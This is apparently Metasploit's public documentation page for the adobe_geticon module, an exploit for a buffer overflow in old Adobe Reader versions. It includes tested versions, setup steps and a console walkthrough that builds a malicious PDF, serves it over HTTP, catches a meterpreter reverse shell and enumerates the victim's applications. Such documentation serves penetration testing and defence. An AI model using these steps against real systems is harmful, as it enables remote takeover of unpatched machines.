CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/fileformat/adobe_geticon.md
Views: 1904

Vulnerable Application

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.

Link to vulnerable software OldVersion

Test results (on Windows XP SP3)

  • reader 7.0.5 - no trigger

  • reader 7.0.8 - no trigger

  • reader 7.0.9 - no trigger

  • reader 7.1.0 - no trigger

  • reader 7.1.1 - reported not vulnerable

  • reader 8.0.0 - works

  • reader 8.1.2 - works

  • reader 8.1.3 - reported not vulnerable

  • reader 9.0.0 - works

  • reader 9.1.0 - reported not vulnerable

Options

FILENAME

The file name

Verification Steps

  1. Install application on the target machine

  2. Start msfconsole

  3. Do: use exploit/windows/fileformat/adobe_geticon

  4. Do: set payload [windows/meterpreter/reverse_tcp]

  5. Do: set LHOST [IP]

  6. Do: exploit

  7. Do: use exploit/multi/handler

  8. Do: set LHOST [IP]

  9. Do: exploit

  10. Do: Open PDF on target machine with vulnerable software

Scenarios

Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)

msf > use exploit/windows/fileformat/adobe_geticon
msf exploit(windows/fileformat/adobe_geticon) > set FILENAME icon.pdf
  FILENAME => icon.pdf
msf exploit(windows/fileformat/adobe_geticon) > exploit

  [*] Creating 'icon.pdf' file...
  [+] icon.pdf stored at /root/.msf4/local/icon.pdf
msf exploit(windows/fileformat/adobe_geticon) > cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf
  [*] exec: cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf

msf payload(windows/meterpreter/reverse_tcp) > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.1.3
  LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit

  [*] Started reverse TCP handler on 192.168.1.3:4444
  [*] Sending stage (180291 bytes) to 192.168.1.5
  [*] Meterpreter session 3 opened (192.168.1.3:4444 -> 192.168.1.5:1160) at 2019-12-06 14:40:10 -0700

meterpreter > sysinfo
  Computer        : COMPUTER_1
  OS              : Windows XP (5.1 Build 2600, Service Pack 3).
  Architecture    : x86
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
meterpreter > getuid
  Server username: COMPUTER_1\USER
meterpreter > run post/windows/gather/enum_applications

  [*] Enumerating applications installed on COMPUTER_1

  Installed Applications
  ======================

   Name            Version
   ----            -------
   Adobe Reader 8  8.0.0


  [+] Results stored in: /root/.msf4/loot/20191206144654_default_192.168.1.5_host.application_162364.txt